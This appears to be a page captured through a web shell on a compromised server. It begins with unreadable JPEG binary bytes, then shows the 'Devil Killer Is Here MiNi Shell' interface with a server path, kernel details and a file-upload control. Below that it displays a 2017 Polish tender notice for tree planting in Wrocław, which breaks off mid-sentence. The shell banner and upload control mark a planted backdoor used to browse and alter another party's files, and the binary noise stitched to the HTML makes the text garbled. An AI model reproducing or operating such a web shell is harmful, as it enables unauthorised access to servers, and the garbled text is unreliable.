JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20170707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20170707/546990-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 546990-N-2017 z dnia 2017-07-07 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Wrocławskie Inwestycje sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Wykonanie nasadzeń zieleni wraz z 3 letnim okresem pielęgnacji w ramach kompensacji zieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 we Wrocławiu - etap I</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Wrocławskie Inwestycje sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">2056852900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Ofiar Oświęcimskich</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">36</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">50059 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wrocław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">71 77 10 905, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">magdalena.swiatek@wi.wroc.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">71 77 10 904</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.wi.wroc.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.wi.wroc.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.wi.wroc.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Wrocławskie Inwestycje Sp. z o. o. ul. Ofiar Oświęcimskich 36, 50-059 Wrocław, sekretariat (pokój nr 3, V piętro)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Wykonanie nasadzeń zieleni wraz z 3 letnim okresem pielęgnacji w ramach kompensacji zieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 we Wrocławiu - etap I</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP/17/PN/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">maksymalnej liczby części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci">3</span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">3</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Część nr 1, Zadanie nr 1: Przedmiotem zamówienia w zakresie Części 1 Zadanie 1:dokumentacja projektowa, nasadzenia oraz elementy małej architektury przy ul. Konduktorskiej weWrocławiu w ramach nasadzeń wyrównujących za wycinkę zieleni na zadaniu: 03170 ,,Przebudowa ul.Buforowej w ciągu drogi wojewódzkiej nr 395 we Wrocławiu - etap I" Przedmiot zamówieniaobejmuje wykonanie dokumentacji projektowej, uzyskanie wymaganych uzgodnień, wykonanienasadzeń i elementów małej architektury oraz prowadzenie pielęgnacji nasadzonej zieleni w 3 letnimokresie. Dokumentacja projektowa powinna zostać opracowana na podstawie ,,KoncepcjiZagospodarowania Terenu wzdłuż ul. Konduktorskiej we Wrocławiu" z uwzględnieniem projektu iwykonanych robót w ramach zadania ,,Rozbudowa ul. Konduktorskiej wraz z budową ciągu pieszorowerowego"oraz w zakresie linii rozgraniczających tego projektu a także z uwzględnieniem zapisówOpisu Przedmiotu Zamówienia. Wszelkie roboty powinny być prowadzone przy zapewnieniu nadzoruogrodniczego. 2. Część nr 2, Zadanie nr 2: Przedmiot zamówienia w zakresie Części 2 Zadanie 2:dokumentacja projektowa, nasadzenia wzdłuż ciągu pieszo-rowerowego od ul. Konduktorskiej do ul.Buforowej bocznej w ramach nasadzeń wyrównujących za wycinkę zieleni na zadaniu: 03170,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 we Wrocławiu - etap I" Przedmiotzamówienia obejmuje wykonanie dokumentacji projektowej, uzyskanie wymaganych uzgodnień,wykonanie nasadzeń oraz prowadzenie pielęgnacji nasadzonej zieleni w 3 letnim okresie.Dokumentacja projektowa powinna zostać opracowana zgodnie z programem funkcjonalnoużytkowymbędącym elementem OPZ. Wszelkie roboty powinny być prowadzone przy zapewnieniunadzoru ogrodniczego. 3. Część nr 3, Zadanie nr 3: Przedmiotem zamówienia w zakresie Części 3Zadanie 3: nasadzenia przy ul. Bardzkiej we Wrocławiu w ramach nasadzeń wyrównujących zawycinkę zieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 weWrocławiu - etap I" Przedmiot zamówienia obejmuje wykonanie nasadzeń zieleni zgodnie zprojektem ,,Zagospodarowania zielenią niską i wysoką wzdłuż ul. Bardzkiej, na odcinku od ul.Hubskiej do ul. Swieradowskiej we Wrocławiu" - etap 2 i 3 (z wyłączeniem drzew oznaczonych wetapie 3 jako ,,wymagające uzyskania odstępstwa") oraz prowadzenie pielęgnacji nasadzonej zieleni w3 letnim okresie. Wszelkie roboty powinny być prowadzone przy zapewnieniu nadzoru ogrodniczego</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">77211600-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77222000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71220000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77211500-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77312100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39150000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>77310000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-11-03</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Termin wykonania zamówienia: 1. Dla części 1 i 2: Przedmiotzamówienia będzie realizowany od dnia podpisania Umowy w następujących terminach: - w terminiedo 06.10.2017 r. Wykonawca opracuje i uzgodni pozytywnie projekt wykonawczy nasadzeń zeZDIUM, ZZM i Plastykiem Miejskim oraz uzyska akceptację Zamawiającego dla tego projektu; - wterminie do 03.11.2017 r. Wykonawca wykona wszystkie roboty objęte wykonanym przez siebie iuzgodnionym projektem wykonawczym wraz z operatem kolaudacyjnym oraz wszelkie inneobowiązki zgodnie z wzorem umowy (Część II SIWZ) i OPZ (Część III SIWZ), z wyłączeniemczynności pielęgnacyjnych oraz przewidzianych w okresie rękojmi i gwarancji; - w terminie 3 lat oddaty podpisania pozytywnego protokołu odbioru końcowego, o którym mowa w § 5 ust. 3 wzoruumowy, Wykonawca będzie prowadził stałą pielęgnację zieleni zgodnie z wzorem umowy oraz OPZ.2. Dla części 3: Przedmiot umowy będzie realizowany od dnia podpisania Umowy w następującychterminach: - w terminie do 03.11.2017 r. Wykonawca wykona wszystkie roboty objęte projektemwykonawczym wraz z operatem kolaudacyjnym oraz wszelkie inne obowiązki nałożone Umową, zwyłączeniem czynności pielęgnacyjnych oraz przewidzianych w okresie rękojmi i gwarancji; - wterminie 3 lat od daty podpisania pozytywnego protokołu odbioru końcowego, o którym mowa w § 5ust. 3 wzoru umowy Wykonawca będzie prowadził stałą pielęgnację zieleni zgodnie z Umową oraz OPZ.Dla części 3 termin zakończenia nasadzeń (zakończonych podpisaniem protokołu odbioru końcowego, o którym mowa w § 5ust. 3 wzoru umowy) stanowi kryterium oceny ofert.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1. Wykonawca powinien dysponować zdolnością techniczną i zawodową;aby Zamawiający uznał Wykonawcę za spełniającego warunek dysponowania zdolnościątechniczną i zawodową, Wykonawca musi spełniać następujące warunki (w przypadku wspólnegoubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, ocenianybędzie ich łączny potencjał techniczny i zawodowy): Dla Części 1: 1.1 w okresie ostatnich 5 latprzed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wtym okresie Wykonawca zrealizował, co najmniej jedną usługę polegającą na wykonaniu nasadzeńdrzew lub krzewów w liczbie co najmniej 100 szt. w terenie miejskim wraz z pielęgnacją tychnasadzeń przez okres co najmniej 12 miesięcy; Dla Części 2: 1.2 w okresie ostatnich 5 lat przedupływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie Wykonawca zrealizował, co najmniej jedną usługę polegającą na wykonaniu nasadzeńdrzew w liczbie co najmniej 50 szt. w terenie miejskim wraz z pielęgnacją tych nasadzeń przezokres co najmniej 12 miesięcy; Dla Części 3: 1.3. w okresie ostatnich 5 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawcazrealizował, co najmniej jedną usługę polegającą na wykonaniu nasadzeń drzew lub krzewów wliczbie co najmniej 100 szt. w terenie miejskim wraz z pielęgnacją tych nasadzeń przez okres conajmniej 12 miesięcy; W przypadku ubiegania się o więcej niż jedną część wskazanych powyżejilości nie należy sumować, tzn. np. Wykonawca, który zrealizował jedną usługę nasadzenia ipielęgnacji drzew w liczbie 100, może złożyć ofertę na wszystkie części zamówienia. W przypadkuwskazania przez Wykonawcę usługi wykonywanej a nie zakończonej (w toku) Zamawiającywymaga aby 12 miesięczny okres pielęgnacji w terenie miejskim: drzew lub krzewów (w liczbachwskazanych powyżej) upłynął przed terminem składania ofert oraz 2. wskazać do uczestniczenia wwykonaniu niniejszego zamówienia następujące osoby odpowiedzialne za świadczenie usług wraz zinformacjami na temat ich kwalifikacji zawodowych, uprawnień, wykształcenia i doświadczenia,niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności orazinformacją o podstawie do dysponowania tymi osobami: Dla części 1: 2.1. - projektant zieleni - (1osoba o minimalnych poziomach zdolności określonych poniżej) osoba posiadająca wykształceniewyższe po ukończeniu studiów na kierunku architektura krajobrazu oraz posiadające doświadczeniepolegające na wykonaniu jako architekt krajobrazu co najmniej dwóch projektów, każdyobejmujący zaprojektowanie nasadzeń zieleni niskiej i wysokiej na powierzchni minimum 0,5 ha wterenie miejskim, oraz 2.2. - projektant branży drogowej - (1 osoba o minimalnych poziomachzdolności określonych poniżej) osoba posiadająca uprawnienia budowlane do projektowania wspecjalności inżynieryjnej drogowej, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawobudowlane (t.j. Dz. U. z 2016, poz. 290 ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury iRozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych wbudownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlanewydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwyorgan, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji 